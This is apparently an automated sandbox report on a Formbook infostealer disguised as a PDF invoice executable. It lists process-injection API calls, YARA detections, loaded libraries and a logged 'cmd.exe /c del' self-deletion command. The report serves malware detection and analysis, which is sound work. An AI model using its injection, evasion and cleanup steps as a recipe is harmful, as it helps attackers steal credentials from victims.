          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2DD0 NtDelayExecution,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2DF0 NtQuerySystemInformation,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2D10 NtMapViewOfSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2FE0 NtCreateFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2F30 NtCreateSection,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2AD0 NtReadFile,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2BE0 NtQueryValueKey,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2B60 NtClose,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB35C0 NtCreateMutant,LdrInitializeThunk
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB4650 NtSuspendThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB4340 NtSetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2CC0 NtQueryVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2CF0 NtOpenProcess
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2C00 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2DB0 NtEnumerateKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2D00 NtSetInformationFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2D30 NtUnmapViewOfSection
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2EE0 NtQueueApcThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2E80 NtReadVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2E30 NtWriteVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2F90 NtProtectVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2FB0 NtResumeThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2FA0 NtQuerySection
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2F60 NtCreateProcessEx
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2AF0 NtWriteFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2AB0 NtWaitForSingleObject
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2B80 NtQueryInformationFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB2BA0 NtEnumerateValueKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB3090 NtSetValueKey
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB3010 NtOpenDirectoryObject
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB3D70 NtOpenThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB3D10 NtOpenProcessToken
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04DB39B0 NtGetContextThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02C5A3D0 NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02C5A320 NtCreateFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02C5A450 NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02C5A500 NtAllocateVirtualMemory
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02C5A3CD NtReadFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02C5A31A NtCreateFile
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_02C5A44A NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BEA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BE9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BEA042 NtQueryInformationProcess
          Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04BE9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007B4021: CreateFileW,DeviceIoControl,CloseHandle
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007A8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007B545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 262 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 103 times
          Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 99 times
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: String function: 00770D27 appears 70 times
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: String function: 00778B40 appears 42 times
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exeCode function: String function: 00757F41 appears 35 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DEEA12 appears 86 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DFF290 appears 103 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DB5130 appears 58 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04DC7E54 appears 107 times
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 04D6B970 appears 262 times
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670465741.0000000004333000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Genesis RMS Private Limited November 2024 pdf.exe
          Source: Genesis RMS Private Limited November 2024 pdf.exe, 00000000.00000003.1670219592.00000000044DD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Genesis RMS Private Limited November 2024 pdf.exe
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.Genesis RMS Private Limited November 2024 pdf.exe.2680000.1.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4129777121.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4129269808.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.4140991356.000000000E62C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1673176319.0000000002680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1734086746.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.4129685702.0000000004AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1734335737.0000000000940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.1734980468.0000000003650000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: Genesis RMS Private Limited November 2024 pdf.exe PID: 7684, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: svchost.exe PID: 7700, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 7800, type: MEMORYSTR | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engine | Classification label: mal100.troj.evad.winEXE@8/2@11/1
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BA2D5 GetLastError,FormatMessageW
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007A8713 AdjustTokenPrivileges,CloseHandle
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_007BC602 CoInitialize,CoCreateInstance,CoUninitialize
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Code function: 0_2_00754FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
          Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | File created: C:\Users\user\AppData\Local\Temp\autD964.tmp
          Source: C:\Windows\SysWOW64\rundll32.exe | Command line argument: WLDP.DLL 3_2_00C24136
          Source: C:\Windows\SysWOW64\rundll32.exe | Command line argument: localserver 3_2_00C24136
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
          Source: Genesis RMS Private Limited November 2024 pdf.exe | ReversingLabs: Detection: 26%
          Source: unknown | Process created: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe"
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\svchost.exe"
          Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: wsock32.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: version.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: winmm.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: mpr.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: iphlpapi.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: userenv.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\Genesis RMS Private Limited November 2024 pdf.exe | Section loaded: wldp.dll
          Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static file information: File size 1086464 > 1048576
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: Genesis RMS Private Limited November 2024 pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
